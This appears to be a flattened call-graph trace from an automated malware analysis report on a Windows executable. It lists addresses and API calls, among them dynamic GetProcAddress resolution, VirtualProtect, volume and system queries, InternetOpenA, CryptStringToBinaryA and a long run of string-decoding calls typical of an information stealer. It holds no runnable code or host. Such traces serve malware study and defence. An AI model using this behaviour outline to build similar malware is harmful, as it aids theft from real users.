13683->13684 13685 695d0a 13684->13685 13686 69a8a0 lstrcpy 13685->13686 13687 695d16 13686->13687 13688 69a9b0 4 API calls 13687->13688 13689 695d3a 13688->13689 13690 69a8a0 lstrcpy 13689->13690 13691 695d46 13690->13691 13692 69a9b0 4 API calls 13691->13692 13693 695d6a 13692->13693 13694 69a8a0 lstrcpy 13693->13694 13695 695d76 13694->13695 13696 69a740 lstrcpy 13695->13696 13697 695d9e 13696->13697 14627 697500 GetWindowsDirectoryA 13697->14627 13700 69a7a0 lstrcpy 13701 695db8 13700->13701 14637 684880 13701->14637 13703 695dbe 14782 6917a0 13703->14782 13705 695dc6 13706 69a740 lstrcpy 13705->13706 13707 695de9 13706->13707 13708 681590 lstrcpy 13707->13708 13709 695dfd 13708->13709 14798 685960 13709->14798 13711 695e03 14942 691050 13711->14942 13713 695e0e 13714 69a740 lstrcpy 13713->13714 13715 695e32 13714->13715 13716 681590 lstrcpy 13715->13716 13717 695e46 13716->13717 13718 685960 34 API calls 13717->13718 13719 695e4c 13718->13719 14946 690d90 13719->14946 13721 695e57 13722 69a740 lstrcpy 13721->13722 13723 695e79 13722->13723 13724 681590 lstrcpy 13723->13724 13725 695e8d 13724->13725 13726 685960 34 API calls 13725->13726 13727 695e93 13726->13727 14953 690f40 13727->14953 13729 695e9e 13730 681590 lstrcpy 13729->13730 13731 695eb5 13730->13731 14958 691a10 13731->14958 13733 695eba 13734 69a740 lstrcpy 13733->13734 13735 695ed6 13734->13735 15302 684fb0 GetProcessHeap RtlAllocateHeap InternetOpenA 13735->15302 13737 695edb 13738 681590 lstrcpy 13737->13738 13739 695f5b 13738->13739 15309 690740 13739->15309 13741 695f60 13742 69a740 lstrcpy 13741->13742 13743 695f86 13742->13743 13744 681590 lstrcpy 13743->13744 13745 695f9a 13744->13745 13746 685960 34 API calls 13745->13746 13747 695fa0 13746->13747 13841 6845d1 RtlAllocateHeap 13840->13841 13844 684621 VirtualProtect 13841->13844 13844->13489 13845->13576 13848 6810c2 ctype 13846->13848 13847 6810fd 13847->13606 13848->13847 13849 6810e2 VirtualFree 13848->13849 13849->13847 13851 681233 GlobalMemoryStatusEx 13850->13851 13851->13609 13852->13633 13854 69a7c2 13853->13854 13855 69a7ec 13854->13855 13856 69a7da lstrcpy 13854->13856 13855->13638 13856->13855 13858 69a740 lstrcpy 13857->13858 13859 696833 13858->13859 13860 69a9b0 4 API calls 13859->13860 13861 696845 13860->13861 13862 69a8a0 lstrcpy 13861->13862 13863 69684e 13862->13863 13864 69a9b0 4 API calls 13863->13864 13865 696867 13864->13865 13866 69a8a0 lstrcpy 13865->13866 13867 696870 13866->13867 13868 69a9b0 4 API calls 13867->13868 13869 69688a 13868->13869 13870 69a8a0 lstrcpy 13869->13870 13871 696893 13870->13871 13872 69a9b0 4 API calls 13871->13872 13873 6968ac 13872->13873 13874 69a8a0 lstrcpy 13873->13874 13875 6968b5 13874->13875 13876 69a9b0 4 API calls 13875->13876 13877 6968cf 13876->13877 13878 69a8a0 lstrcpy 13877->13878 13879 6968d8 13878->13879 13880 69a9b0 4 API calls 13879->13880 13881 6968f3 13880->13881 13882 69a8a0 lstrcpy 13881->13882 13883 6968fc 13882->13883 13884 69a7a0 lstrcpy 13883->13884 13885 696910 13884->13885 13885->13645 13887 69a812 13886->13887 13887->13648 13889 69a83f 13888->13889 13890 695b54 13889->13890 13891 69a87b lstrcpy 13889->13891 13890->13658 13891->13890 13893 69a8a0 lstrcpy 13892->13893 13894 696443 13893->13894 13895 69a8a0 lstrcpy 13894->13895 13896 696455 13895->13896 13897 69a8a0 lstrcpy 13896->13897 13898 696467 13897->13898 13899 69a8a0 lstrcpy 13898->13899 13900 695b86 13899->13900 13900->13664 13902 6845c0 2 API calls 13901->13902 13903 6826b4 13902->13903 13904 6845c0 2 API calls 13903->13904 13905 6826d7 13904->13905 13906 6845c0 2 API calls 13905->13906 13907 6826f0 13906->13907 13908 6845c0 2 API calls 13907->13908 13909 682709 13908->13909 13910 6845c0 2 API calls 13909->13910 13911 682736 13910->13911 13912 6845c0 2 API calls 13911->13912 13913 68274f 13912->13913 13914 6845c0 2 API calls 13913->13914 13915 682768 13914->13915 13916 6845c0 2 API calls 13915->13916 13917 682795 13916->13917 13918 6845c0 2 API calls 13917->13918 13919 6827ae 13918->13919 13920 6845c0 2 API calls 13919->13920 13921 6827c7 13920->13921 13922 6845c0 2 API calls 13921->13922 13923 6827e0 13922->13923 13924 6845c0 2 API calls 13923->13924 13925 6827f9 13924->13925 13926 6845c0 2 API calls 13925->13926 13927 682812 13926->13927 13928 6845c0 2 API calls 13927->13928 13929 68282b 13928->13929 13930 6845c0 2 API calls 13929->13930 13931 682844 13930->13931 13932 6845c0 2 API calls 13931->13932 13933 68285d 13932->13933 13934 6845c0 2 API calls 13933->13934 13935 682876 13934->13935 13936 6845c0 2 API calls 13935->13936 13937 68288f 13936->13937 13938 6845c0 2 API calls 13937->13938 13939 6828a8 13938->13939 13940 6845c0 2 API calls 13939->13940 13941 6828c1 13940->13941 13942 6845c0 2 API calls 13941->13942 13943 6828da 13942->13943 13944 6845c0 2 API calls 13943->13944 13945 6828f3 13944->13945 13946 6845c0 2 API calls 13945->13946 13947 68290c 13946->13947 13948 6845c0 2 API calls 13947->13948 13949 682925 13948->13949 13950 6845c0 2 API calls 13949->13950 13951 68293e 13950->13951 13952 6845c0 2 API calls 13951->13952 13953 682957 13952->13953 13954 6845c0 2 API calls 13953->13954 13955 682970 13954->13955 13956 6845c0 2 API calls 13955->13956 13957 682989 13956->13957 13958 6845c0 2 API calls 13957->13958 13959 6829a2 13958->13959 13960 6845c0 2 API calls 13959->13960 13961 6829bb 13960->13961 13962 6845c0 2 API calls 13961->13962 13963 6829d4 13962->13963 13964 6845c0 2 API calls 13963->13964 13965 6829ed 13964->13965 13966 6845c0 2 API calls 13965->13966 13967 682a06 13966->13967 13968 6845c0 2 API calls 13967->13968 13969 682a1f 13968->13969 13970 6845c0 2 API calls 13969->13970 13971 682a38 13970->13971 13972 6845c0 2 API calls 13971->13972 13973 682a51 13972->13973 13974 6845c0 2 API calls 13973->13974 13975 682a6a 13974->13975 13976 6845c0 2 API calls 13975->13976 13977 682a83 13976->13977 13978 6845c0 2 API calls 13977->13978 13979 682a9c 13978->13979 13980 6845c0 2 API calls 13979->13980 13981 682ab5 13980->13981 13982 6845c0 2 API calls 13981->13982 13983 682ace 13982->13983 13984 6845c0 2 API calls 13983->13984 13985 682ae7 13984->13985 13986 6845c0 2 API calls 13985->13986 13987 682b00 13986->13987 13988 6845c0 2 API calls 13987->13988 13989 682b19 13988->13989 13990 6845c0 2 API calls 13989->13990 13991 682b32 13990->13991 13992 6845c0 2 API calls 13991->13992 13993 682b4b 13992->13993 13994 6845c0 2 API calls 13993->13994 13995 682b64 13994->13995 13996 6845c0 2 API calls 13995->13996 13997 682b7d 13996->13997 13998 6845c0 2 API calls 13997->13998 13999 682b96 13998->13999 14000 6845c0 2 API calls 13999->14000 14001 682baf 14000->14001 14002 6845c0 2 API calls 14001->14002 14003 682bc8 14002->14003 14004 6845c0 2 API calls 14003->14004 14005 682be1 14004->14005 14006 6845c0 2 API calls 14005->14006 14007 682bfa 14006->14007 14008 6845c0 2 API calls 14007->14008 14009 682c13 14008->14009 14010 6845c0 2 API calls 14009->14010 14011 682c2c 14010->14011 14012 6845c0 2 API calls 14011->14012 14013 682c45 14012->14013 14014 6845c0 2 API calls 14013->14014 14015 682c5e 14014->14015 14016 6845c0 2 API calls 14015->14016 14017 682c77 14016->14017 14018 6845c0 2 API calls 14017->14018 14019 682c90 14018->14019 14020 6845c0 2 API calls 14019->14020 14021 682ca9 14020->14021 14022 6845c0 2 API calls 14021->14022 14023 682cc2 14022->14023 14024 6845c0 2 API calls 14023->14024 14025 682cdb 14024->14025 14026 6845c0 2 API calls 14025->14026 14027 682cf4 14026->14027 14028 6845c0 2 API calls 14027->14028 14029 682d0d 14028->14029 14030 6845c0 2 API calls 14029->14030 14031 682d26 14030->14031 14032 6845c0 2 API calls 14031->14032 14033 682d3f 14032->14033 14034 6845c0 2 API calls 14033->14034 14035 682d58 14034->14035 14036 6845c0 2 API calls 14035->14036 14037 682d71 14036->14037 14038 6845c0 2 API calls 14037->14038 14039 682d8a 14038->14039 14040 6845c0 2 API calls 14039->14040 14041 682da3 14040->14041 14042 6845c0 2 API calls 14041->14042 14043 682dbc 14042->14043 14044 6845c0 2 API calls 14043->14044 14045 682dd5 14044->14045 14046 6845c0 2 API calls 14045->14046 14047 682dee 14046->14047 14048 6845c0 2 API calls 14047->14048 14049 682e07 14048->14049 14050 6845c0 2 API calls 14049->14050 14051 682e20 14050->14051 14052 6845c0 2 API calls 14051->14052 14053 682e39 14052->14053 14054 6845c0 2 API calls 14053->14054 14055 682e52 14054->14055 14056 6845c0 2 API calls 14055->14056 14057 682e6b 14056->14057 14058 6845c0 2 API calls 14057->14058 14059 682e84 14058->14059 14060 6845c0 2 API calls 14059->14060 14061 682e9d 14060->14061 14062 6845c0 2 API calls 14061->14062 14063 682eb6 14062->14063 14064 6845c0 2 API calls 14063->14064 14065 682ecf 14064->14065 14066 6845c0 2 API calls 14065->14066 14067 682ee8 14066->14067 14068 6845c0 2 API calls 14067->14068 14069 682f01 14068->14069 14070 6845c0 2 API calls 14069->14070 14071 682f1a 14070->14071 14072 6845c0 2 API calls 14071->14072 14073 682f33 14072->14073 14074 6845c0 2 API calls 14073->14074 14075 682f4c 14074->14075 14076 6845c0 2 API calls 14075->14076 14077 682f65 14076->14077 14078 6845c0 2 API calls 14077->14078 14079 682f7e 14078->14079 14080 6845c0 2 API calls 14079->14080 14081 682f97 14080->14081 14082 6845c0 2 API calls 14081->14082 14083 682fb0 14082->14083 14084 6845c0 2 API calls 14083->14084 14085 682fc9 14084->14085 14086 6845c0 2 API calls 14085->14086 14087 682fe2 14086->14087 14088 6845c0 2 API calls 14087->14088 14089 682ffb 14088->14089 14090 6845c0 2 API calls 14089->14090 14091 683014 14090->14091 14092 6845c0 2 API calls 14091->14092 14093 68302d 14092->14093 14094 6845c0 2 API calls 14093->14094 14095 683046 14094->14095 14096 6845c0 2 API calls 14095->14096 14097 68305f 14096->14097 14098 6845c0 2 API calls 14097->14098 14099 683078 14098->14099 14100 6845c0 2 API calls 14099->14100 14101 683091 14100->14101 14102 6845c0 2 API calls 14101->14102 14103 6830aa 14102->14103 14104 6845c0 2 API calls 14103->14104 14105 6830c3 14104->14105 14106 6845c0 2 API calls 14105->14106 14107 6830dc 14106->14107 14108 6845c0 2 API calls 14107->14108 14109 6830f5 14108->14109 14110 6845c0 2 API calls 14109->14110 14111 68310e 14110->14111 14112 6845c0 2 API calls 14111->14112 14113 683127 14112->14113 14114 6845c0 2 API calls 14113->14114 14115 683140 14114->14115 14116 6845c0 2 API calls 14115->14116 14117 683159 14116->14117 14118 6845c0 2 API calls 14117->14118 14119 683172 14118->14119 14120 6845c0 2 API calls 14119->14120 14121 68318b 14120->14121 14122 6845c0 2 API calls 14121->14122 14123 6831a4 14122->14123 14124 6845c0 2 API calls 14123->14124 14125 6831bd 14124->14125 14126 6845c0 2 API calls 14125->14126 14127 6831d6 14126->14127 14128 6845c0 2 API calls 14127->14128 14129 6831ef 14128->14129 14130 6845c0 2 API calls 14129->14130 14131 683208 14130->14131 14132 6845c0 2 API calls 14131->14132 14133 683221 14132->14133 14134 6845c0 2 API calls 14133->14134 14135 68323a 14134->14135 14136 6845c0 2 API calls 14135->14136 14137 683253 14136->14137 14138 6845c0 2 API calls 14137->14138 14139 68326c 14138->14139 14140 6845c0 2 API calls 14139->14140 14141 683285 14140->14141 14142 6845c0 2 API calls 14141->14142 14143 68329e 14142->14143 14144 6845c0 2 API calls 14143->14144 14145 6832b7 14144->14145 14146 6845c0 2 API calls 14145->14146 14147 6832d0 14146->14147 14148 6845c0 2 API calls 14147->14148 14149 6832e9 14148->14149 14150 6845c0 2 API calls 14149->14150 14151 683302 14150->14151 14152 6845c0 2 API calls 14151->14152 14153 68331b 14152->14153 14154 6845c0 2 API calls 14153->14154 14155 683334 14154->14155 14156 6845c0 2 API calls 14155->14156 14157 68334d 14156->14157 14158 6845c0 2 API calls 14157->14158 14159 683366 14158->14159 14160 6845c0 2 API calls 14159->14160 14161 68337f 14160->14161 14162 6845c0 2 API calls 14161->14162 14163 683398 14162->14163 14164 6845c0 2 API calls 14163->14164 14165 6833b1 14164->14165 14166 6845c0 2 API calls 14165->14166 14167 6833ca 14166->14167 14168 6845c0 2 API calls 14167->14168 14169 6833e3 14168->14169 14170 6845c0 2 API calls 14169->14170 14171 6833fc 14170->14171 14172 6845c0 2 API calls 14171->14172 14173 683415 14172->14173 14174 6845c0 2 API calls 14173->14174 14175 68342e 14174->14175 14176 6845c0 2 API calls 14175->14176 14177 683447 14176->14177 14178 6845c0 2 API calls 14177->14178 14179 683460 14178->14179 14180 6845c0 2 API calls 14179->14180 14181 683479 14180->14181 14182 6845c0 2 API calls 14181->14182 14183 683492 14182->14183 14184 6845c0 2 API calls 14183->14184 14185 6834ab 14184->14185 14186 6845c0 2 API calls 14185->14186 14187 6834c4 14186->14187 14188 6845c0 2 API calls 14187->14188 14189 6834dd 14188->14189 14190 6845c0 2 API calls 14189->14190 14191 6834f6 14190->14191 14192 6845c0 2 API calls 14191->14192 14193 68350f 14192->14193 14194 6845c0 2 API calls 14193->14194 14195 683528 14194->14195 14196 6845c0 2 API calls 14195->14196 14197 683541 14196->14197 14198 6845c0 2 API calls 14197->14198 14199 68355a 14198->14199 14200 6845c0 2 API calls 14199->14200 14201 683573 14200->14201 14202 6845c0 2 API calls 14201->14202 14203 68358c 14202->14203 14204 6845c0 2 API calls 14203->14204 14205 6835a5 14204->14205 14206 6845c0 2 API calls 14205->14206 14207 6835be 14206->14207 14208 6845c0 2 API calls 14207->14208 14209 6835d7 14208->14209 14210 6845c0 2 API calls 14209->14210 14211 6835f0 14210->14211 14212 6845c0 2 API calls 14211->14212 14213 683609 14212->14213 14214 6845c0 2 API calls 14213->14214 14215 683622 14214->14215 14216 6845c0 2 API calls 14215->14216 14217 68363b 14216->14217 14218 6845c0 2 API calls 14217->14218 14219 683654 14218->14219 14220 6845c0 2 API calls 14219->14220 14221 68366d 14220->14221 14222 6845c0 2 API calls 14221->14222 14223 683686 14222->14223 14224 6845c0 2 API calls 14223->14224 14225 68369f 14224->14225 14226 6845c0 2 API calls 14225->14226 14227 6836b8 14226->14227 14228 6845c0 2 API calls 14227->14228 14229 6836d1 14228->14229 14230 6845c0 2 API calls 14229->14230 14231 6836ea 14230->14231 14232 6845c0 2 API calls 14231->14232 14233 683703 14232->14233 14234 6845c0 2 API calls 14233->14234 14235 68371c 14234->14235 14236 6845c0 2 API calls 14235->14236 14237 683735 14236->14237 14238 6845c0 2 API calls 14237->14238 14239 68374e 14238->14239 14240 6845c0 2 API calls 14239->14240 14241 683767 14240->14241 14242 6845c0 2 API calls 14241->14242 14243 683780 14242->14243 14244 6845c0 2 API calls 14243->14244 14245 683799 14244->14245 14246 6845c0 2 API calls 14245->14246 14247 6837b2 14246->14247 14248 6845c0 2 API calls 14247->14248 14249 6837cb 14248->14249 14250 6845c0 2 API calls 14249->14250 14251 6837e4 14250->14251 14252 6845c0 2 API calls 14251->14252 14253 6837fd 14252->14253 14254 6845c0 2 API calls 14253->14254 14255 683816 14254->14255 14256 6845c0 2 API calls 14255->14256 14257 68382f 14256->14257 14258 6845c0 2 API calls 14257->14258 14259 683848 14258->14259 14260 6845c0 2 API calls 14259->14260 14261 683861 14260->14261 14262 6845c0 2 API calls 14261->14262 14263 68387a 14262->14263 14264 6845c0 2 API calls 14263->14264 14265 683893 14264->14265 14266 6845c0 2 API calls 14265->14266 14267 6838ac 14266->14267 14268 6845c0 2 API calls 14267->14268 14269 6838c5 14268->14269 14270 6845c0 2 API calls 14269->14270 14271 6838de 14270->14271 14272 6845c0 2 API calls 14271->14272 14273 6838f7 14272->14273 14274 6845c0 2 API calls 14273->14274 14275 683910 14274->14275 14276 6845c0 2 API calls 14275->14276 14277 683929 14276->14277 14278 6845c0 2 API calls 14277->14278 14279 683942 14278->14279 14280 6845c0 2 API calls 14279->14280 14281 68395b 14280->14281 14282 6845c0 2 API calls 14281->14282 14283 683974 14282->14283 14284 6845c0 2 API calls 14283->14284 14285 68398d 14284->14285 14286 6845c0 2 API calls 14285->14286 14287 6839a6 14286->14287 14288 6845c0 2 API calls 14287->14288 14289 6839bf 14288->14289 14290 6845c0 2 API calls 14289->14290 14291 6839d8 14290->14291 14292 6845c0 2 API calls 14291->14292 14293 6839f1 14292->14293 14294 6845c0 2 API calls 14293->14294 14295 683a0a 14294->14295 14296 6845c0 2 API calls 14295->14296 14297 683a23 14296->14297 14298 6845c0 2 API calls 14297->14298 14299 683a3c 14298->14299 14300 6845c0 2 API calls 14299->14300 14301 683a55 14300->14301 14302 6845c0 2 API calls 14301->14302 14303 683a6e 14302->14303 14304 6845c0 2 API calls 14303->14304 14305 683a87 14304->14305 14306 6845c0 2 API calls 14305->14306 14307 683aa0 14306->14307 14308 6845c0 2 API calls 14307->14308 14309 683ab9 14308->14309 14310 6845c0 2 API calls 14309->14310 14311 683ad2 14310->14311 14312 6845c0 2 API calls 14311->14312 14313 683aeb 14312->14313 14314 6845c0 2 API calls 14313->14314 14315 683b04 14314->14315 14316 6845c0 2 API calls 14315->14316 14317 683b1d 14316->14317 14318 6845c0 2 API calls 14317->14318 14319 683b36 14318->14319 14320 6845c0 2 API calls 14319->14320 14321 683b4f 14320->14321 14322 6845c0 2 API calls 14321->14322 14323 683b68 14322->14323 14324 6845c0 2 API calls 14323->14324 14325 683b81 14324->14325 14326 6845c0 2 API calls 14325->14326 14327 683b9a 14326->14327 14328 6845c0 2 API calls 14327->14328 14329 683bb3 14328->14329 14330 6845c0 2 API calls 14329->14330 14331 683bcc 14330->14331 14332 6845c0 2 API calls 14331->14332 14333 683be5 14332->14333 14334 6845c0 2 API calls 14333->14334 14335 683bfe 14334->14335 14336 6845c0 2 API calls 14335->14336 14337 683c17 14336->14337 14338 6845c0 2 API calls 14337->14338 14339 683c30 14338->14339 14340 6845c0 2 API calls 14339->14340 14341 683c49 14340->14341 14342 6845c0 2 API calls 14341->14342 14343 683c62 14342->14343 14344 6845c0 2 API calls 14343->14344 14345 683c7b 14344->14345 14346 6845c0 2 API calls 14345->14346 14347 683c94 14346->14347 14348 6845c0 2 API calls 14347->14348 14349 683cad 14348->14349 14350 6845c0 2 API calls 14349->14350 14351 683cc6 14350->14351 14352 6845c0 2 API calls 14351->14352 14353 683cdf 14352->14353 14354 6845c0 2 API calls 14353->14354 14355 683cf8 14354->14355 14356 6845c0 2 API calls 14355->14356 14357 683d11 14356->14357 14358 6845c0 2 API calls 14357->14358 14359 683d2a 14358->14359 14360 6845c0 2 API calls 14359->14360 14361 683d43 14360->14361 14362 6845c0 2 API calls 14361->14362 14363 683d5c 14362->14363 14364 6845c0 2 API calls 14363->14364 14365 683d75 14364->14365 14366 6845c0 2 API calls 14365->14366 14367 683d8e 14366->14367 14368 6845c0 2 API calls 14367->14368 14369 683da7 14368->14369 14370 6845c0 2 API calls 14369->14370 14371 683dc0 14370->14371 14372 6845c0 2 API calls 14371->14372 14373 683dd9 14372->14373 14374 6845c0 2 API calls 14373->14374 14375 683df2 14374->14375 14376 6845c0 2 API calls 14375->14376 14377 683e0b 14376->14377 14378 6845c0 2 API calls 14377->14378 14379 683e24 14378->14379 14380 6845c0 2 API calls 14379->14380 14381 683e3d 14380->14381 14382 6845c0 2 API calls 14381->14382 14383 683e56 14382->14383 14384 6845c0 2 API calls 14383->14384 14385 683e6f 14384->14385 14386 6845c0 2 API calls 14385->14386 14387 683e88 14386->14387 14388 6845c0 2 API calls 14387->14388 14389 683ea1 14388->14389 14390 6845c0 2 API calls 14389->14390 14391 683eba 14390->14391 14392 6845c0 2 API calls 14391->14392 14393 683ed3 14392->14393 14394 6845c0 2 API calls 14393->14394 14395 683eec 14394->14395 14396 6845c0 2 API calls 14395->14396 14397 683f05 14396->14397 14398 6845c0 2 API calls 14397->14398 14399 683f1e 14398->14399 14400 6845c0 2 API calls 14399->14400 14401 683f37 14400->14401 14402 6845c0 2 API calls 14401->14402 14403 683f50 14402->14403 14404 6845c0 2 API calls 14403->14404 14405 683f69 14404->14405 14406 6845c0 2 API calls 14405->14406 14407 683f82 14406->14407 14408 6845c0 2 API calls 14407->14408 14409 683f9b 14408->14409 14410 6845c0 2 API calls 14409->14410 14411 683fb4 14410->14411 14412 6845c0 2 API calls 14411->14412 14413 683fcd 14412->14413 14414 6845c0 2 API calls 14413->14414 14415 683fe6 14414->14415 14416 6845c0 2 API calls 14415->14416 14417 683fff 14416->14417 14418 6845c0 2 API calls 14417->14418 14419 684018 14418->14419 14420 6845c0 2 API calls 14419->14420 14421 684031 14420->14421 14422 6845c0 2 API calls 14421->14422 14423 68404a 14422->14423 14424 6845c0 2 API calls 14423->14424 14425 684063 14424->14425 14426 6845c0 2 API calls 14425->14426 14427 68407c 14426->14427 14428 6845c0 2 API calls 14427->14428 14429 684095 14428->14429 14430 6845c0 2 API calls 14429->14430 14431 6840ae 14430->14431 14432 6845c0 2 API calls 14431->14432 14433 6840c7 14432->14433 14434 6845c0 2 API calls 14433->14434 14435 6840e0 14434->14435 14436 6845c0 2 API calls 14435->14436 14437 6840f9 14436->14437 14438 6845c0 2 API calls 14437->14438 14439 684112 14438->14439 14440 6845c0 2 API calls 14439->14440 14441 68412b 14440->14441 14442 6845c0 2 API calls 14441->14442 14443 684144 14442->14443 14444 6845c0 2 API calls 14443->14444 14445 68415d 14444->14445 14446 6845c0 2 API calls 14445->14446 14447 684176 14446->14447 14448 6845c0 2 API calls 14447->14448 14449 68418f 14448->14449 14450 6845c0 2 API calls 14449->14450 14451 6841a8 14450->14451 14452 6845c0 2 API calls 14451->14452 14453 6841c1 14452->14453 14454 6845c0 2 API calls 14453->14454 14455 6841da 14454->14455 14456 6845c0 2 API calls 14455->14456 14457 6841f3 14456->14457 14458 6845c0 2 API calls 14457->14458 14459 68420c 14458->14459 14460 6845c0 2 API calls 14459->14460 14461 684225 14460->14461 14462 6845c0 2 API calls 14461->14462 14463 68423e 14462->14463 14464 6845c0 2 API calls 14463->14464 14465 684257 14464->14465 14466 6845c0 2 API calls 14465->14466 14467 684270 14466->14467 14468 6845c0 2 API calls 14467->14468 14469 684289 14468->14469 14470 6845c0 2 API calls 14469->14470 14471 6842a2 14470->14471 14472 6845c0 2 API calls 14471->14472 14473 6842bb 14472->14473 14474 6845c0 2 API calls 14473->14474 14475 6842d4 14474->14475 14476 6845c0 2 API calls 14475->14476 14477 6842ed 14476->14477 14478 6845c0 2 API calls 14477->14478 14479 684306 14478->14479 14480 6845c0 2 API calls 14479->14480 14481 68431f 14480->14481 14482 6845c0 2 API calls 14481->14482 14483 684338 14482->14483 14484 6845c0 2 API calls 14483->14484 14485 684351 14484->14485 14486 6845c0 2 API calls 14485->14486 14487 68436a 14486->14487 14488 6845c0 2 API calls 14487->14488 14489 684383 14488->14489 14490 6845c0 2 API calls 14489->14490 14491 68439c 14490->14491 14492 6845c0 2 API calls 14491->14492 14493 6843b5 14492->14493 14494 6845c0 2 API calls 14493->14494 14495 6843ce 14494->14495 14496 6845c0 2 API calls 14495->14496 14497 6843e7 14496->14497 14498 6845c0 2 API calls 14497->14498 14499 684400 14498->14499 14500 6845c0 2 API calls 14499->14500 14501 684419 14500->14501 14502 6845c0 2 API calls 14501->14502 14503 684432 14502->14503 14504 6845c0 2 API calls 14503->14504 14505 68444b 14504->14505 14506 6845c0 2 API calls 14505->14506 14507 684464 14506->14507 14508 6845c0 2 API calls 14507->14508 14509 68447d 14508->14509 14510 6845c0 2 API calls 14509->14510 14511 684496 14510->14511 14512 6845c0 2 API calls 14511->14512 14513 6844af 14512->14513 14514 6845c0 2 API calls 14513->14514 14515 6844c8 14514->14515 14516 6845c0 2 API calls 14515->14516 14517 6844e1 14516->14517 14518 6845c0 2 API calls 14517->14518 14519 6844fa 14518->14519 14520 6845c0 2 API calls 14519->14520 14521 684513 14520->14521 14522 6845c0 2 API calls 14521->14522 14523 68452c 14522->14523 14524 6845c0 2 API calls 14523->14524 14525 684545 14524->14525 14526 6845c0 2 API calls 14525->14526 14527 68455e 14526->14527 14528 6845c0 2 API calls 14527->14528 14529 684577 14528->14529 14530 6845c0 2 API calls 14529->14530 14531 684590 14530->14531 14532 6845c0 2 API calls 14531->14532 14533 6845a9 14532->14533 14534 699c10 14533->14534 14535 699c20 43 API calls 14534->14535 14536 69a036 8 API calls 14534->14536 14535->14536 14537 69a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14536->14537 14538 69a146 14536->14538 14537->14538 14539 69a153 8 API calls 14538->14539 14540 69a216 14538->14540 14539->14540 14541 69a298 14540->14541 14542 69a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14540->14542 14543 69a2a5 6 API calls 14541->14543 14544 69a337 14541->14544 14542->14541 14543->14544 14545 69a41f 14544->14545 14546 69a344 9 API calls 14544->14546 14547 69a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14545->14547 14548 69a4a2 14545->14548 14546->14545 14547->14548 14549 69a4ab GetProcAddress GetProcAddress 14548->14549 14550 69a4dc 14548->14550 14549->14550 14551 69a515 14550->14551 14552 69a4e5 GetProcAddress GetProcAddress 14550->14552 14553 69a612 14551->14553 14554 69a522 10 API calls 14551->14554 14552->14551 14555 69a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14553->14555 14556 69a67d 14553->14556 14554->14553 14555->14556 14557 69a69e 14556->14557 14558 69a686 GetProcAddress 14556->14558 14559 695ca3 14557->14559 14560 69a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14557->14560 14558->14557 14561 681590 14559->14561 14560->14559 15680 681670 14561->15680 14564 69a7a0 lstrcpy 14565 6815b5 14564->14565 14566 69a7a0 lstrcpy 14565->14566 14567 6815c7 14566->14567 14568 69a7a0 lstrcpy 14567->14568 14569 6815d9 14568->14569 14570 69a7a0 lstrcpy 14569->14570 14571 681663 14570->14571 14572 695510 14571->14572 14573 695521 14572->14573 14574 69a820 2 API calls 14573->14574 14575 69552e 14574->14575 14576 69a820 2 API calls 14575->14576 14577 69553b 14576->14577 14578 69a820 2 API calls 14577->14578 14579 695548 14578->14579 14580 69a740 lstrcpy 14579->14580 14581 695555 14580->14581 14582 69a740 lstrcpy 14581->14582 14583 695562 14582->14583 14584 69a740 lstrcpy 14583->14584 14585 69556f 14584->14585 14586 69a740 lstrcpy 14585->14586 14599 69557c 14586->14599 14587 6951f0 20 API calls 14587->14599 14588 695643 StrCmpCA 14588->14599 14589 6956a0 StrCmpCA 14590 6957dc 14589->14590 14589->14599 14591 69a8a0 lstrcpy 14590->14591 14592 6957e8 14591->14592 14593 69a820 2 API calls 14592->14593 14595 6957f6 14593->14595 14594 69a820 lstrlen lstrcpy 14594->14599 14597 69a820 2 API calls 14595->14597 14596 695856 StrCmpCA 14598 695991 14596->14598 14596->14599 14601 695805 14597->14601 14600 69a8a0 lstrcpy 14598->14600 14599->14587 14599->14588 14599->14589 14599->14594 14599->14596 14605 69a740 lstrcpy 14599->14605 14607 695a0b StrCmpCA 14599->14607 14608 6952c0 25 API calls 14599->14608 14612 69a7a0 lstrcpy 14599->14612 14620 69578a StrCmpCA 14599->14620 14623 681590 lstrcpy 14599->14623 14624 69593f StrCmpCA 14599->14624 14625 69a8a0 lstrcpy 14599->14625 14602 69599d 14600->14602 14603 681670 lstrcpy 14601->14603 14604 69a820 2 API calls 14602->14604 14626 695811 14603->14626 14606 6959ab 14604->14606 14605->14599 14609 69a820 2 API calls 14606->14609 14610 695a28 14607->14610 14611 695a16 Sleep 14607->14611 14608->14599 14613 6959ba 14609->14613 14614 69a8a0 lstrcpy 14610->14614 14611->14599 14612->14599 14615 681670 lstrcpy 14613->14615 14616 695a34 14614->14616 14615->14626 14617 69a820 2 API calls 14616->14617 14618 695a43 14617->14618 14619 69a820 2 API calls 14618->14619 14621 695a52 14619->14621 14620->14599 14622 681670 lstrcpy 14621->14622 14622->14626 14623->14599 14624->14599 14625->14599 14626->13679 14628 69754c 14627->14628 14629 697553 GetVolumeInformationA 14627->14629 14628->14629 14630 697591 14629->14630 14631 6975fc GetProcessHeap RtlAllocateHeap 14630->14631 14632 697619 14631->14632 14633 697628 wsprintfA 14631->14633 14634 69a740 lstrcpy 14632->14634 14635 69a740 lstrcpy 14633->14635 14636 695da7 14634->14636 14635->14636 14636->13700 14638 69a7a0 lstrcpy 14637->14638 14639 684899 14638->14639 15689 6847b0 14639->15689 14641 6848a5 14642 69a740 lstrcpy 14641->14642 14643 6848d7 14642->14643 14644 69a740 lstrcpy 14643->14644 14645 6848e4 14644->14645 14646 69a740 lstrcpy 14645->14646 14647 6848f1 14646->14647 14648 69a740 lstrcpy 14647->14648 14649 6848fe 14648->14649 14650 69a740 lstrcpy 14649->14650 14651 68490b InternetOpenA StrCmpCA 14650->14651 14652 684944 14651->14652 14653 684ecb InternetCloseHandle 14652->14653 15695 698b60 14652->15695 14655 684ee8 14653->14655 15710 689ac0 CryptStringToBinaryA 14655->15710 14656 684963 15703 69a920 14656->15703 14660 684976 14661 69a8a0 lstrcpy 14660->14661 14666 68497f 14661->14666 14662 69a820 2 API calls 14663 684f05 14662->14663 14664 69a9b0 4 API calls 14663->14664 14667 684f1b 14664->14667 14665 684f27 ctype 14669 69a7a0 lstrcpy 14665->14669 14670 69a9b0 4 API calls 14666->14670 14668 69a8a0 lstrcpy 14667->14668 14668->14665 14682 684f57 14669->14682 14671 6849a9 14670->14671 14672 69a8a0 